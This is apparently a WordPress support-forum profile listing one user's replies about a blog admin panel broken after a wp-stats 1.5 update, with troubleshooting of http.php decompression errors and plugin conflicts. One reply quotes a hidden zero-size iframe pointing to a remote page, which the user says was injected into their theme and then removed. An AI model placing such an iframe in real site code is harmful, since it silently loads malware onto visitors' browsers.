vitalbodies
Forum Replies Created
-
Forum: Plugins
In reply to: Admin panel messed up and data errors related to http.phpThis type of virus seems to be added to themes at the very least. Not by the theme people but some other way. I removed the code from the index.php in the theme directory of my current theme and the errors went away at least for now.
Forum: Plugins
In reply to: Admin panel messed up and data errors related to http.phpWhat about malware like this:
<iframe src="https://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Could this be the problem?
Note: Malware can cause problems and compromise your computer or website.
Forum: Plugins
In reply to: Admin panel messed up and data errors related to http.phpThanks Andy for taking the time to write.
…So many people.
I do not really want to suppress the errors at this point. And have not had time for the bug report as I was away on a trip. I did the latest WP upgrade and no luck.
Forum: Plugins
In reply to: Admin panel messed up and data errors related to http.phpUpdating to wp-stats 1.5 causes errors but does not blow out the admin.
I had to down grade to 1.4 again.Forum: Plugins
In reply to: Admin panel messed up and data errors related to http.phpI thought I had tried this, but I deactivated All in One SEO Pack and the control panel is back to normal.
Forum: Plugins
In reply to: Admin panel messed up and data errors related to http.phpWell, grabbing another http.php from my other blog did not help so I restored the original. What would be the navigation on the left goes clear across the whole view port forcing everything else below that like stats, if you on the stats page, or edit post if your on that page or so on…
Forum: Plugins
In reply to: Problems with wp-stats update to 1.5xeduced: That is the classic look of the stats if you are logged into the blog but not logged into the stats. Try a refresh on the page and see if you have to log in to stats.
Forum: Plugins
In reply to: Problems with wp-stats update to 1.5Today, upon restarting the browser the error messages also show up on all the other pages so the entire admin panel is blown out rather than just the dashboard.
Forum: Plugins
In reply to: Problems with wp-stats update to 1.5Did anyone else also update All in One SEO Pack like I did? I did the stats first then All in One SEO Pack.
Forum: Plugins
In reply to: Problems with wp-stats update to 1.5The dashboard is still blown out? Any ideas, should I grab a http.php from elsewhere and overwrite it or?
I not trouble shot a wordpress blog before…Forum: Plugins
In reply to: Problems with wp-stats update to 1.5Disabling or enabling the two programs that use the dashboard does not help.
Forum: Plugins
In reply to: Problems with wp-stats update to 1.5Going back to 1.4 fixed the stats problem but the dashboard is still blown out.
Forum: Plugins
In reply to: Problems with wp-stats update to 1.5I deleted, downloaded and FTP/reinstalled the 1.5 plug-in and that did not help.
One thing I did notice is that the final message during the initial upgrade when this problem all began, that (I think) tells you the plug-in is initialized, was not the correct font or perhaps font size. Just seeing that I thought, oh no…Forum: Plugins
In reply to: Problems with wp-stats update to 1.5I updated to wp-stats 1.5 on my WordPress 2.8 blog.
It blew out the Dashboard and redirects to the home page of the blog if I go to the stats page. The blown out page looks a bit like if you have to many or too few end tags for a div.Just before redirecting you see these errors at the top of the stas page:
Warning: gzinflate() [function.gzinflate]: data error in //vitalbodies.com/blog/wp-includes/http.php on line 1788 Warning: gzuncompress() [function.gzuncompress]: data error in vitalbodies.com/blog/wp-includes/http.php on line 1793
This is what is on the lines mentioned:
1788: $decompressed = gzinflate( $compressed ); 1793: $decompressed = gzuncompress( $compressed );